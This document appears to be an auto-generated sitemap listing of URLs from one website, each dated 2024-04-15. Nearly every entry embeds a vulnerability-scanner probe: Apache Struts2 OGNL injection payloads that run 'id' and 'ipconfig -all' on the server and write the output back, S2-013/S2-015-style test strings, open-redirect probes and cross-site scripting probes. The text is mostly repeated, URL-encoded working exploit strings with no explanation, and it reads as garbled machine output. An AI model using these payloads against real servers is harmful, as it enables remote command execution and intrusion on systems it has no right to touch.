http://nysadhg.v3.hnrich.net/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?test=%24%7b%5cu0023_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27anonymous_%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().print(%27security_s2013_test%27)%2c%40org.apache.struts2.servletactioncontext%40getresponse().getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp:%2f%2fnysadhg.v3.hnrich.net:80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f=fsm53413%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem48667? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?=%3c1a161b%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html%3fdefault.action%3fmessage=(%23_memberaccess%5b%27allowprivateaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27excludedpackagenamepatterns%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27excludedclasses%27%5d%3d%23_memberaccess%5b%27acceptproperties%27%5d%2c%23_memberaccess%5b%27allowpackageprotectedaccess%27%5d%3dtrue%2c%23_memberaccess%5b%27allowstaticmethodaccess%27%5d%3dtrue%2c%40org.apache.commons.io.ioutils%40tostring(%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()))? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?user.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc(_a1ad6849-0694-4d10-8d67-2ed1726d40d4_002_product.html%3f?=%3c308684%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?method%3a%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access%2c%23context%5b%23parameters.obj%5b0%5d%5d.getwriter().print(%23parameters.content%5b0%5d%2b201%2b20702)%2c1%3f%23xx%3a%23request.tostring&obj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1gq1a? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3fuser.action? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?$%7b100002-1%2b'anonymous_'%2b'security_s2015_test'%7d.action 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%3f_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f?=%3c0795a2%3c 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&z%5b(class.classloader.jarpath)(%27meh%27)%5d&class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27ipconfig%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_0dbff864-212a-400e-bcad-ed270d6ebb9e%3f_002_product.html%3f=http%3a%2f%2fwww.site120.cn%2fwebscantest_alert.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield('allowstaticmethodaccess')%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string%5b%5d%7b'id'%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew%20java.io.inputstreamreader(%23b)%2c%23d%3dnew%20java.io.bufferedreader(%23c)%2c%23e%3dnew%20char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close() 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f%3fdebug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?redirect:$%7b%23a%3d(new%20java.lang.processbuilder(new%20java.lang.string[]%7b'ipconfig','-all'%7d)).start(),%23b%3d%23a.getinputstream(),%23c%3dnew%20java.io.inputstreamreader(%23b),%23d%3dnew%20java.io.bufferedreader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23test%3d%23context.get('com.opensymphony.xwork2.dispatcher.httpservletresponse'),%23test.getwriter().println(%23e),%23test.getwriter().flush(),%23test.getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_74065e5f-c87a-4ddf-91d9-8a4c858675e4%3f_002_product.html%3f&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?class.classloader.jarpath=(%23context%5b%22xwork.methodaccessor.denymethodexecution%22%5d%3d+new+java.lang.boolean(false)%2c+%23_memberaccess%5b%22allowstaticmethodaccess%22%5d%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime().exec(%27id%27).getinputstream()%2c%23b%3dnew+java.io.inputstreamreader(%23a)%2c%23c%3dnew+java.io.bufferedreader(%23b)%2c%23d%3dnew+char%5b50000%5d%2c%23c.read(%23d)%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23test.println(%23d)%2c%23test.close())(meh)&z%5b(class.classloader.jarpath)(%27meh%27)%5d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?debug=command&expression=%23f%3d%23_memberaccess.getclass().getdeclaredfield(%27allowstaticmethodaccess%27)%2c%23f.setaccessible(true)%2c%23f.set(%23_memberaccess%2ctrue)%2c%23req%3d%40org.apache.struts2.servletactioncontext%40getrequest()%2c%23resp%3d%40org.apache.struts2.servletactioncontext%40getresponse().getwriter()%2c%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27id%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b10000%5d%2c%23d.read(%23e)%2c%23resp.println(%23e)%2c%23resp.close()? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?default.action?message=(%23_memberaccess[%27allowprivateaccess%27]%3dtrue,%23_memberaccess[%27allowprotectedaccess%27]%3dtrue,%23_memberaccess[%27excludedpackagenamepatterns%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27excludedclasses%27]%3d%23_memberaccess[%27acceptproperties%27],%23_memberaccess[%27allowpackageprotectedaccess%27]%3dtrue,%23_memberaccess[%27allowstaticmethodaccess%27]%3dtrue,@org.apache.commons.io.ioutils@tostring(@java.lang.runtime@getruntime().exec(%27ipconfig%27).getinputstream())) 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_74065e5f-c87a-4ddf-91d9-8a4c858675e4_002_product.html?debug=browser&object=(%23mem%3d%23_memberaccess%3d%40ognl.ognlcontext%40default_member_access)%3f%23context%5b%23parameters.rpsobj%5b0%5d%5d.getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702)%3axx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?class.classloader.jarpath=%28%23context[%22xwork.methodaccessor.denymethodexecution%22]%3d+new+java.lang.boolean%28false%29%2c+%23_memberaccess[%22allowstaticmethodaccess%22]%3dtrue%2c+%23a%3d%40java.lang.runtime%40getruntime%28%29.exec('id').getinputstream%28%29%2c%23b%3dnew+java.io.inputstreamreader%28%23a%29%2c%23c%3dnew+java.io.bufferedreader%28%23b%29%2c%23d%3dnew+char[50000]%2c%23c.read%28%23d%29%2c%23test%3d%40org.apache.struts2.servletactioncontext%40getresponse%28%29.getwriter%28%29%2c%23test.println%28%23d%29%2c%23test.close%28%29%29%28meh%29&z[%28class.classloader.jarpath%29%28%27meh%27%29] 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?(%27%5c43_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(aaa)((%27%5c43context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5c75false%27)(d))&(%27%5c43c%27)((%27%5c43_memberaccess.excludeproperties%5c75%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5c43rp%5c75%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5c43rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5c43rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(grgr)((%27%5c43rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?=cmvmbgvjdgvkyw5vbnltb3vzc2vjdxjpdhkz 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?&('%5cu0023_memberaccess[%5c'allowstaticmethodaccess%5c']')(meh)=true&(aaa)(('%5cu0023context[%5c'xwork.methodaccessor.denymethodexecution%5c']%5cu003dfalse')(d))&('%5cu0023c')(('%5cu0023_memberaccess.excludeproperties%5cu003d@java.util.collections@empty_set')(c))&(asdf)(('%5cu0023rp%5cu003d@org.apache.struts2.servletactioncontext@getresponse()')(c))&(fgd)(('%5cu0023rp.getwriter().print(%5c'anon3ymmous%5c')')(d))&(fgd)(('%5cu0023rp.getwriter().print(%5c'security_struts_test%5c')')(d))&(grgr)(('%5cu0023rp.getwriter().close()')(d))=1 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_016f8152-c843-41f8-9cb2-efec610ef1ea%3f_002_product.html%3f=%3c1a161b%3c? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?&test=$%7b%5cu0023_memberaccess[%22allowstaticmethodaccess%22]=true,@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('anonymous_'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().print('security_s2013_test'),@org.apache.struts2.servletactioncontext@getresponse().getwriter().close()%7d 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/xsstest?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?=fsm17836%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem75931 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html??debug=browser&object=(%23mem%3d%23_memberaccess%3d@ognl.ognlcontext@default_member_access)%3f%23context[%23parameters.rpsobj[0]].getwriter().println(%23parameters.content%5b0%5d%2b201%2b20702):xx.tostring.json&rpsobj=com.opensymphony.xwork2.dispatcher.httpservletresponse&content=1b27330647921342bbb2c0173e2b27b3 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html%3f&redirect%3ahttp%3a%2f%2fwww.anonymous.com%2f? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc%27%5b%5d_24f1338e-79a9-4e79-93f3-0ab797ba1530_002_product.html%3f&redirect%3a%24%7b%23a%3d(new+java.lang.processbuilder(new+java.lang.string%5b%5d%7b%27ipconfig%27%2c%27-all%27%7d)).start()%2c%23b%3d%23a.getinputstream()%2c%23c%3dnew+java.io.inputstreamreader(%23b)%2c%23d%3dnew+java.io.bufferedreader(%23c)%2c%23e%3dnew+char%5b50000%5d%2c%23d.read(%23e)%2c%23test%3d%23context.get(%27com.opensymphony.xwork2.dispatcher.httpservletresponse%27)%2c%23test.getwriter().println(%23e)%2c%23test.getwriter().flush()%2c%23test.getwriter().close()%7d? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html/fsm17836%ef%bc%9cf1%ef%b9%a5f2%ca%baf3%ca%b9fem75931?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_24f1338e-79a9-4e79-93f3-0ab797ba1530%3f_002_product.html? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c(_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?xsstest? 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c'_0dbff864-212a-400e-bcad-ed270d6ebb9e_002_product.html?=%3c8426a6%20x%3d946296788%3e 0.5 2024-04-15 http://nysadhg.v3.hnrich.net/404.html?404;http://nysadhg.v3.hnrich.net:80/2017/11/27/nysadhg/pc/products/c_a1ad6849-0694-4d10-8d67-2ed1726d40d4'%5b%5d_002_product.html?404%3bhttp%3a%2f%2fnysadhg.v3.hnrich.net%3a80%2f2017%2f11%2f27%2fnysadhg%2fpc%2fproducts%2fc_a1ad6849-0694-4d10-8d67-2ed1726d40d4%27%5b%5d_002_product.html%3f&(aaa)((%27%5cu0023context%5b%5c%27xwork.methodaccessor.denymethodexecution%5c%27%5d%5cu003dfalse%27)(d))&(%27%5cu0023c%27)((%27%5cu0023_memberaccess.excludeproperties%5cu003d%40java.util.collections%40empty_set%27)(c))&(asdf)((%27%5cu0023rp%5cu003d%40org.apache.struts2.servletactioncontext%40getresponse()%27)(c))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27anon3ymmous%5c%27)%27)(d))&(fgd)((%27%5cu0023rp.getwriter().print(%5c%27security_struts_test%5c%27)%27)(d))&(%27%5cu0023_memberaccess%5b%5c%27allowstaticmethodaccess%5c%27%5d%27)(meh)=true&(grgr)((%27%5cu0023rp.getwriter().close()%27)(d))=1? 0.5 2024-04-15 